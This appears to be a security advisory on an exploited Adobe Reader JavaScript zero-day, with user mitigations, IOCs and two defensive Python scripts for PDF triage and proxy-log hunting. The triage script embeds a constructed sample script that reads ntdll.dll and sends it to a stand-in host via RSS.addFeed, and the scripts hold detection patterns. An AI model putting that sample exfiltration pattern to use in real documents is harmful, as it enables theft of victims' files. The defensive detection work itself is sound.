Adobe Reader Zero-Day Exploited in Targeted Fingerprinting Campaign
Take action: If you use Adobe Reader, disable JavaScript now: open Edit > Preferences > JavaScript and uncheck "Enable Acrobat JavaScript". This blocks the exploit's main attack path. Until you have installed Adobe's patch (see the update below), do not open PDF files from unknown or unexpected sources; if you must view an untrusted PDF, use a browser's built-in viewer (Chrome or Edge) rather than Adobe Reader, and verify where a file came from before opening it.
Learn More
A security researcher has reported a critical zero-day vulnerability in Adobe Reader that lets an attacker steal data and compromise a system when the victim simply opens a file. Haifei Li discovered the flaw, which has been exploited in the wild since at least December 2025. The exploit targets the latest versions of the software and went unnoticed for months because the malicious document had a very low detection rate on security scanning platforms.
The vulnerability, tracked as CVE-2026-34621 (CVSS 8.6, Adobe severity Critical), is a logic flaw in Reader's JavaScript engine that lets malicious script cross the sandbox's security boundary. The attackers use obfuscated scripts to call privileged APIs such as util.readFileIntoStream(), which document-level script is normally not allowed to run, to reach the local file system. The document can therefore read arbitrary files and establish a command-and-control channel for further payload delivery.
Update, 12 April 2026: Adobe has assigned the tracking ID CVE-2026-34621, rated the flaw Critical with a CVSS score of 8.6, and released a patch.
The exploit fingerprints the victim's environment to identify targets of interest before deploying more damaging payloads. The data it can exfiltrate includes:
- Operating system version and language settings
- Adobe Reader version and local file paths
- Sensitive system files such as ntdll.dll
- Arbitrary local data accessible to the sandboxed process
Analysis of the malicious PDF, named yummy_adobe_exploit_uwu.pdf, shows that it uses the RSS.addFeed() API to send the stolen data to remote servers. The campaign's infrastructure includes the IP addresses 169.40.2.68 and 188.214.34.20, which receive the exfiltrated data and serve encrypted JavaScript updates to the document. This multi-stage approach suggests a targeted effort to gain persistent access to specific corporate or government networks.
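The two API names above are the most useful static indicators an analyst has for this document. The following triage script is an added example, not code from the report or from the researcher: it walks a PDF's objects, inflates FlateDecode streams (where the script would otherwise be hidden from a plain string search), and reports whether the file runs JavaScript on open and whether the inflated script names util.readFileIntoStream or RSS.addFeed. The sample PDF it builds is constructed here for the demonstration; the embedded script only names those two APIs and is not the exploit. The object, stream and /Length parsing assumes an ordinary uncompressed object layout (no object streams), which is labelled in the comments.

```python
import re
import zlib

# Indicators from the report: the privileged Acrobat JavaScript APIs the
# exploit calls and the PDF keys that make a document run script on open.
SUSPICIOUS_APIS = (b"util.readFileIntoStream", b"RSS.addFeed")
SCRIPT_TRIGGERS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA")

# Assumption: objects are laid out as "N 0 obj ... endobj" in the file body
# (object streams, which pack objects inside a compressed stream, are not walked).
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.DOTALL)
STREAM_START_RE = re.compile(rb"(?<!end)stream\r?\n")
# Only a direct integer /Length; "/Length 5 0 R" (indirect) is left to the fallback.
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\s*(?=/|>>)")


def extract_streams(pdf: bytes):
    """Yield (object number, stream body) for every stream in the file.

    The body is sliced by /Length when the dictionary gives it directly,
    otherwise by the endstream keyword. FlateDecode bodies are inflated;
    anything that fails to inflate (other filters, damaged data) is
    returned raw so the string search still sees it.
    """
    for num, obj in OBJ_RE.findall(pdf):
        m = STREAM_START_RE.search(obj)
        if not m:
            continue
        dict_part = obj[:m.start()]
        lm = LENGTH_RE.search(dict_part)
        if lm:
            body = obj[m.end():m.end() + int(lm.group(1))]
        else:
            body = obj[m.end():obj.rfind(b"endstream")].rstrip(b"\r\n")
        if b"/FlateDecode" in dict_part:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass  # not valid zlib: keep the raw bytes
        yield int(num), body


def triage_pdf(pdf: bytes) -> dict:
    """Static triage: does the file run JavaScript, and does the script
    (after inflating streams) name the privileged APIs from the report?"""
    decoded = [body for _, body in extract_streams(pdf)]
    haystacks = [pdf] + decoded
    triggers = sorted({t.decode() for t in SCRIPT_TRIGGERS
                       if any(t in h for h in haystacks)})
    raw_apis = sorted({a.decode() for a in SUSPICIOUS_APIS if a in pdf})
    stream_apis = sorted({a.decode() for a in SUSPICIOUS_APIS
                          if any(a in h for h in decoded)})
    if raw_apis or stream_apis:
        verdict = "high"    # privileged file/network APIs referenced by name
    elif "/JavaScript" in triggers or "/JS" in triggers:
        verdict = "medium"  # script present; names may be hidden by obfuscation
    else:
        verdict = "low"
    return {"verdict": verdict, "script_triggers": triggers,
            "apis_in_raw_bytes": raw_apis, "apis_in_decoded_streams": stream_apis}


def build_sample_pdf(script: bytes) -> bytes:
    """Construct a minimal PDF whose OpenAction runs `script` from a
    FlateDecode stream. Constructed for this example, not the real sample;
    the xref table is omitted because triage does not need it."""
    packed = zlib.compress(script)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript /JS 4 0 R >> >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(packed)
        + packed + b"\nendstream",
    ]
    out = b"%PDF-1.7\n"
    for i, body in enumerate(objs, 1):
        out += b"%d 0 obj\n%s\nendobj\n" % (i, body)
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


# Constructed stand-in that merely names the two APIs the report describes;
# it is not the exploit and does nothing useful outside this demonstration.
SAMPLE_SCRIPT = b"""
var blob = util.readFileIntoStream("/C/Windows/System32/ntdll.dll");
RSS.addFeed("http://example.invalid/feed?d=" + util.stringFromStream(blob));
"""

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pdf(SAMPLE_SCRIPT)
    print(triage_pdf(data))
```

Run it with a file path to triage a real document, or with no arguments to see the constructed sample: the API names are absent from the raw bytes and only appear once the stream is inflated, which is why a grep over the file misses them. A "medium" verdict (script present, no known API names) is the expected result against the obfuscated loader the report describes, so it should route the file to dynamic analysis rather than be dismissed.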
Adobe Security received the disclosure; at the time of the original report no patch was publicly available (see the update above for the patch release). Organizations should monitor network traffic for the "Adobe Synchronizer" User-Agent string and block the two IP addresses listed above.
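As an added example of the monitoring just described (not code from the report), the script below hunts through proxy log lines for the two published indicators. A destination match on either campaign IP is rated high on its own; a User-Agent match without a known IP is rated medium, because the string is produced by the Reader component and should be confirmed against the destination before a host is isolated. The log layout, the sample lines and the internal addresses are all constructed for this example; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges standing in for benign destinations.

```python
import ipaddress
import re

# Indicators published in the report.
IOC_IPS = {ipaddress.ip_address(a) for a in ("169.40.2.68", "188.214.34.20")}
IOC_USER_AGENT = "Adobe Synchronizer"

# Assumed proxy log layout (constructed for this example):
#   <timestamp> <client_ip> <dest_ip_or_host> <method> <url> "<user-agent>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<method>\S+)\s+'
    r'(?P<url>\S+)\s+"(?P<ua>[^"]*)"\s*$'
)


def parse_line(line: str):
    """Return a record dict for a well-formed line, None otherwise."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    try:
        rec["dst_ip"] = ipaddress.ip_address(rec["dst"])
    except ValueError:
        rec["dst_ip"] = None  # hostname rather than IP; still usable for the UA check
    return rec


def classify(rec: dict) -> tuple:
    """Map one record to (severity, reason); severity is None when clean."""
    ip_hit = rec["dst_ip"] in IOC_IPS
    ua_hit = IOC_USER_AGENT in rec["ua"]
    if ip_hit and ua_hit:
        return "high", "User-Agent and destination both match the campaign"
    if ip_hit:
        return "high", "destination is a known campaign IP"
    if ua_hit:
        return "medium", "User-Agent match only; confirm the destination before acting"
    return None, ""


def hunt(lines) -> list:
    """Scan log lines and return one alert dict per matching line."""
    alerts = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skipped, not silently treated as clean
        sev, why = classify(rec)
        if sev:
            alerts.append({"line": n, "severity": sev, "src": rec["src"],
                           "dst": rec["dst"], "ua": rec["ua"], "reason": why})
    return alerts


def hosts_to_isolate(alerts: list) -> list:
    """Internal hosts with at least one high-severity hit, for the IR queue."""
    return sorted({a["src"] for a in alerts if a["severity"] == "high"})


# Constructed sample log; the second and third lines mimic the exfiltration
# and JavaScript-update fetch the report describes.
SAMPLE_LOG = """\
2026-04-03T09:12:44Z 10.1.4.27 198.51.100.7 GET https://intranet.example/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2026-04-03T09:13:02Z 10.1.4.27 188.214.34.20 POST http://188.214.34.20/feed "Adobe Synchronizer"
2026-04-03T09:13:05Z 10.1.4.27 188.214.34.20 GET http://188.214.34.20/update.js "Adobe Synchronizer"
2026-04-03T09:15:10Z 10.1.4.31 203.0.113.9 GET https://example.invalid/rss "Adobe Synchronizer"
2026-04-03T09:16:01Z 10.1.4.31 169.40.2.68 GET http://169.40.2.68/ "curl/8.4.0"
garbage line that does not parse
""".splitlines()

if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for a in found:
        print(f'line {a["line"]}: {a["severity"]:6} {a["src"]} -> {a["dst"]} ({a["reason"]})')
    print("isolate:", hosts_to_isolate(found))
```

Feed it your own proxy export by adapting LINE_RE to that format; the classification logic does not depend on the layout. Lines the parser rejects are skipped rather than treated as clean, so a count of rejected lines is worth adding before trusting a "no hits" result.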
Users should avoid opening PDF documents from untrusted sources and disable JavaScript in Adobe Reader's preferences to block the exploit's execution path. Administrators can enforce the same setting fleet-wide through Adobe's FeatureLockDown policy (the bDisableJavaScript registry value), which also prevents users from turning JavaScript back on.